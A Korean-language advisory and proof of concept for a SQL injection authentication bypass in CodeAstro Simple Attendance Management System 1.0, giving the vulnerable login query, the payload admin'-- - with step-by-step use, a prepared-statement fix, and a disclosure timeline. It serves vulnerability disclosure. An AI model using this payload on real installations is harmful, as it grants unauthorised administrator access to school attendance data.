
CodeAstro Simple Attendance Management System 1.0의 SQL 인젝션 개념 증명(PoC)으로, 조작된 사용자 이름 페이로드를 통한 인증 우회를 시연합니다.
| 필드 | 정보 |
|---|
| CVE ID | CVE-2026-37749 |
| 유형 | SQL 인젝션 → 인증 우회 |
| 심각도 | 치명적 (CVSSv3: 9.8) |
| 공급업체 | CodeAstro |
| 제품 | 간단 출석 관리 시스템 |
| 버전 | 1.0 |
| 발견자 | Varad AP Mene |
| 날짜 | 2026-04-16 |
| CWE | CWE-89 |
CodeAstro 간단 출석 관리 시스템 v1.0의 index.php 로그인 양식에 SQL 인젝션 취약점이 존재합니다. username POST 매개변수가 삭제(sanitization)나 준비된 명령문(prepared statements) 없이 MySQL 쿼리에 직접 연결됩니다. 인증되지 않은 원격 공격자는 username 필드에 조작된 SQL 페이로드를 제출하여 인증을 우회하고 관리자 액세스 권한을 얻을 수 있습니다.
영향받는 제품: 간단 출석 관리 시스템 v1.0 공급업체: CodeAstro 영향받는 파일: index.php 매개변수: username (POST) 페이로드: admin'-- - CVE: CVE-2026-37749 CWE: CWE-89 CVSSv3: 9.8 치명적 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
간단 출석 관리 시스템 1.0은 CodeAstro가 게시한 PHP/MySQL 웹 애플리케이션으로, 학교와 대학에서 학생 출석 기록을 관리하는 데 사용됩니다.
index.php — 로그인 양식
// index.php - Line 23
$query = "SELECT * FROM admin WHERE username='$username' AND password='$password'";
$result = mysql_query($query);
원시 $_POST 데이터가 직접 사용됨 — 이스케이프 처리 없음, 준비된 명령문 없음.
1단계 — 로그인 페이지로 이동: http://target/attendance/index.php
2단계 — 다음 자격 증명 입력: 사용자 이름: admin'-- - 비밀번호: anything 유형: admin
3단계 — 로그인 클릭 결과: 유효한 자격 증명 없이 관리자 패널 액세스 권한 획득!
$stmt = $mysqli->prepare("SELECT * FROM admin WHERE username=? AND password=?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$result = $stmt->get_result();
| 날짜 | 이벤트 |
|---|---|
| 2026-03-24 | 취약점 발견 |
| 2026-03-24 | MITRE에 보고 |
| 2026-04-16 | CVE-2026-37749 지정 |
| 2026-04-16 | 공개 공개 |
| 2026-04-16 | 게시에 대해 MITRE에 통보 |
| 2026-04-16 | CodeAstro 문의 양식을 통해 공급업체에 통보 |
| 2026-04-16 | Exploit-DB에 제출 |
Varad AP Mene